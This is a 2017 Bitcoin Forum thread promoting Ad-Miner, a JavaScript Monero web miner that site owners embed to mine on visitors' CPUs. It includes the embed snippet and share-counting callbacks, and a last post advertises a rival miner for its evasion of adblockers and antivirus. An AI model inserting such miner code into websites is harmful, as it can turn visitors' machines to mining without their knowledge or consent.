Bitcoin Forum

Economy => Micro Earnings => Topic started by: CineXMike on November 08, 2017, 03:21:08 PM



Title: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 03:21:08 PM
Hi,

Today i introduce Ad-Miner,

Its the cheapest web-miner on the internet at this moment,
with only a 5% commision instead of a 10-30% commision.
You also mine directly at a stratum pool instead of a closed pool(https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)),
therefore you also don't need to register at our site. you can directly copy and paste the code below and start running.

Current Payout:
0.00020625857 per 1M hashes
08-11-17

Overview:
  • No need to register
  • Only a 5% commision
  • Directly view you mining stats at the pools dashboard!

Usage:
We recommend using it with max 4 threads and throttle at 0.3 to not freeze your clients computer(Only change if you know what you're doing.

Code:
<script src="http://ad-miner.com/lib/miner.min.js"></script>
<script>
            // Start miner
            var miner = AdMiner.Anonymous('YourMoneroAdress',{ threads: 4, throttle: 0.3 });
            miner.start();
</script>

Added support for listening hooks,

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

Site: http://ad-miner.com (http://ad-miner.com)

Greetings,
Mike


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: felicita on November 08, 2017, 03:33:59 PM
ok looks great only 5 % fees  ;)
but how can i make a start button for minig so users can self choose if they wanna burn there cpu or not :D


kind regards


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 03:39:41 PM
ok looks great only 5 % fees  ;)
but how can i make a start button for minig so users can self choose if they wanna burn there cpu or not :D


kind regards

I'll add support for that as soon as possible,
I think i can finish that tonight.


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 03:44:50 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 04:04:49 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?
The mining pool has a 0.3 threshold.

My script works with accepted shares,
Instead of hashes,

Ill ADD amount of accepted shares trigger function.


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 05:06:28 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: zuzoovn on November 08, 2017, 05:13:18 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?


current payout ??? XMR per 1M hashes


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 05:16:24 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?


current payout ??? XMR per 1M hashes


Aprox 0.00020625857 per 1M Hashes


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 05:26:25 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 05:30:39 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 05:36:29 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 05:44:49 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 05:48:37 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up :)


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 06:37:49 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up :)

May i ask your current hashrate on coinhive?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 07:25:34 PM
hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up :)

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: tomos81 on November 08, 2017, 08:50:11 PM
Right now I've got:
38184.6 h/s - 2026 users mining

What you're offering is very lucrative, but I've based my code on CH's code and it would take me a lot of time to implement it. Ugh.

I'd suggest people move from CH to this service, since you'd be earning +25% of what CH offers you.
Plus, it runs stratum


hi mex, only problem is, that i cannot solve, OP has not token based user verification, and the method how measure user hashes, is very easily hackable  , just press F12=>console and call event when miner finds a share...  so be careful of the idea to replace coinhive with this service...
i suggest to OP , change hash and accepted share verification to something more secure (public+private API key or so...  something like coinhive)




hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up :)

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 08, 2017, 09:10:10 PM
Right now I've got:
38184.6 h/s - 2026 users mining

What you're offering is very lucrative, but I've based my code on CH's code and it would take me a lot of time to implement it. Ugh.

I'd suggest people move from CH to this service, since you'd be earning +25% of what CH offers you.
Plus, it runs stratum


hi mex, only problem is, that i cannot solve, OP has not token based user verification, and the method how measure user hashes, is very easily hackable  , just press F12=>console and call event when miner finds a share...  so be careful of the idea to replace coinhive with this service...
i suggest to OP , change hash and accepted share verification to something more secure (public+private API key or so...  something like coinhive)




hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard (https://supportxmr.com/#/dashboard)
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up :)

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing
I'll add token based verification soon.


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 10, 2017, 09:47:05 AM
Added multi server support,
Now you dont have to worry about server downtime, that costs you money.


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: botgabe on November 10, 2017, 11:12:45 PM
Threat = 2 and throttle = 0,30 hashrate = 20, Threat = 4 and throttle = 0,50 hashrate = 20   !!!! What is the problem?
Thats your maxim you get with your pc ;)


Mike, we need Api ! Since many of us pay our users to use the miner (and dont hide it) we need to check somehow the users hashes


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 11, 2017, 09:40:08 AM
Threat = 2 and throttle = 0,30 hashrate = 20, Threat = 4 and throttle = 0,50 hashrate = 20   !!!! What is the problem?
Thats your maxim you get with your pc ;)


Mike, we need Api ! Since many of us pay our users to use the miner (and dont hide it) we need to check somehow the users hashes


Api will be released tonight/tomorrow,
I am doing some last finishing touches.


Greetings,
Mike


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 11, 2017, 03:42:56 PM
Hey,

Small pre-update here,

Api user usage:

Code:
<script src="http://ad-miner.com/lib/miner.min.js"></script>
<script>
            // Start miner
            var miner = AdMiner.User('YourAddress', 'my-user-identifier',{ threads: 4, throttle: 0.3 });
            miner.start();

        </script>

Where YourAddress = your monero address
my-user-identifier = unique user id

Greetings,
Mike


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 11, 2017, 04:44:53 PM
Another small update,

Go here to register your api_key,
http://ad-miner.com/members/

Greetings,
Mike


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: CineXMike on November 14, 2017, 11:36:46 AM
Already serving 350 clients!
Sending a whopping 500 KH/s


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: hr15 on November 17, 2017, 11:38:51 AM
your script isn't working anymore? My visitors get the following error:
Code:
miner.min.js:306 WebSocket connection to 'ws://77.162.125.199:8895/' failed: Error in connection establishment: net::ERR_CONNECTION_REFUSED

Nothing changed but it stopped working



Title: Re: Ad-Miner(CoinHive Alternative)
Post by: FaucetSystem.com on November 17, 2017, 12:35:40 PM
Hi!
Are you use https://github.com/deepwn/deepMiner or private code?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: hr15 on November 17, 2017, 12:37:26 PM
Hi!
Are you use https://github.com/deepwn/deepMiner or private code?

the code from http://ad-miner.com/


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: dasair on December 21, 2017, 06:40:00 AM
added to my site.
it's not working anymore.
whats the problem?


Title: Re: Ad-Miner(CoinHive Alternative)
Post by: Gridcash-net on March 19, 2018, 09:42:02 AM
Looks like that project is dead. However Gridcash.net (http://www.gridcash.net)  is not! More than 7 months on market. many major partners, reliable reputation, best protection from adblocks and antiviruses, just check it out! ;)